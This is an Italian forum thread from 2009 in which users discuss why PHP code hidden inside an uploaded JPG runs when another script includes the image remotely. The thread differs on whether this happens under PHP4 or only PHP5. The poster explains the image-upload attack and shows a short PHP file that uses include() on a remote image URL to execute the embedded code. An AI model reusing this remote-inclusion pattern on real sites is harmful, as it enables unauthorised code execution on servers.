Differenza di comportamento di script nelle immagini tra php4 e php5

**andreafallico** · 25-11-2009, 00.42.53

Come mai se nelle immagini metto uno script php, il comportamento è diverso tra php4 e php5?
Se è attivo php4 lo script non viene eseguito, invece se è attivo php5 il codice viene eseguito normalmente.
In pratica l'immagine la richiamo con include in un altro host.
Forse php4 è più sicuro rispetto a php5?

13-12-2009, 13.56.34

Le visualizza solamente se allow_url_fopen nel file php.ini è abilitato. Comunque usa il tag <img>, così risolvi il problema...

**andreafallico** · 13-12-2009, 14.00.54

Originalmente inviato da alessandro1997

Le visualizza solamente se allow_url_fopen nel file php.ini è abilitato. Comunque usa il tag <img>, così risolvi il problema...

Che c'entra

, non hai capito quello che ho scritto.

**saitfainder** · 14-12-2009, 11.46.56

Originalmente inviato da andreafallico

Come mai se nelle immagini metto uno script php, il comportamento è diverso tra php4 e php5?

Uno script php nelle immagini? Cosa vuol dire?

**andreafallico** · 14-12-2009, 12.20.30

Originalmente inviato da saitfainder

Uno script php nelle immagini? Cosa vuol dire?

Quando un sito permette l'upload di immagini, un lamer per bucare il sito inserisce codice php nell'immagine e l'immagine viene richiamata da remoto in un altro host con "include('img.jpg');" e viene eseguito il codice php. Io ho provato, con php4 il codice non viene eseguito e il sito è al sicuro, invece quando attivo php5 il codice presente nell'immagine viene eseguito e il sito viene bucato.

**saitfainder** · 14-12-2009, 13.02.01

Ma tu come hai testato questa roba? Il PHP con estensione JPG dove si trova? E lo script che lo include? Il PHP che viene incluso con che content-type viene servito? Perché uno script dovrebbe includere un file con estensione JPG?

**andreafallico** · 14-12-2009, 13.17.29

Originalmente inviato da saitfainder

Ma tu come hai testato questa roba? Il PHP con estensione JPG dove si trova? E lo script che lo include? Il PHP che viene incluso con che content-type viene servito? Perché uno script dovrebbe includere un file con estensione JPG?

Io ho creato un immagine e ho inserito, in tag particolari dell'immagine, codice php, poi l'ho caricata nel mio spazio web altervista; se uno nella barra degli indirizzi digita sito.altervista.org/img.jpg l'immagine viene visualizzata normalmente.

Poi in locale ho creato un semplice file php così composto:

Codice PHP:


lamer.php

<?php

include('http://sito.altervista.org/img.jpg');

?>

poi dal browser digito http://127.0.0.1/lamer.php e la cosa è fatta, se nel mio spazio web altervista è attivo php4 non succede niente, invece se attivo php5 viene eseguito lo script messo dentro l'immagine.

**mycarlo** · 14-12-2009, 14.42.32

Io ho provato sia con php4 e sia con php5 e lo script viene eseguito comunque.

Saluti!

Discussione: Differenza di comportamento di script nelle immagini tra php4 e php5

LinkBack

Strumenti discussione

Display

Differenza di comportamento di script nelle immagini tra php4 e php5

Regole di scrittura